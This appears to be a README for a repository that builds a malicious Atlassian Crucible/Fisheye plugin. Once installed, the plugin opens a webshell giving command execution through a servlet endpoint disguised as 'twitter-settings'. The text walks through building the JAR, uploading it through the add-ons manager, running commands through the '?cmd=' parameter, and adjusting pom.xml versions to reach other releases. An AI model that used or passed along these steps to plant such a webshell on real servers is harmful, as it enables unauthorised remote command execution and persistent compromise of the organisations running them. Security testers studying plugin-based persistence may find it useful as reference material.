A malicious plugin for Atlassian Crucible/Fisheye that when installed gives command execution via /plugins/servlet/twitter-settings?cmd=id endpoint
- Install Atlassian Plugin SDK. E.g. for MacOS:
brew tap atlassian/tap
brew install atlassian/tap/atlassian-plugin-sdk- Clone this repo & cd into it
git clone https://github.com/UgniusV/fecru-webshell-plugin.git
cd fecru-webshell-plugin- Generate a JAR by running
atlas-package- Generated JAR is now placed at
./target/fecrutwitter-1.0.0-SNAPSHOT.jar - Navigate to http://crucible:8060/plugins/servlet/upm?source=side_nav_manage_addons & install the JAR
- Enjoy your webshell at: http://crucible:8060/plugins/servlet/twitter-settings?cmd=id
Currently this plugin is designed to work with Crucible/Fisheye 4.8.11. If you would like to install it on another version, please change the versions & build numbers accordingly inside pom.xml
<fecru.version>4.8.11-20221216114657</fecru.version>
<fecru.data.version>4.8.11-20221216114657</fecru.data.version>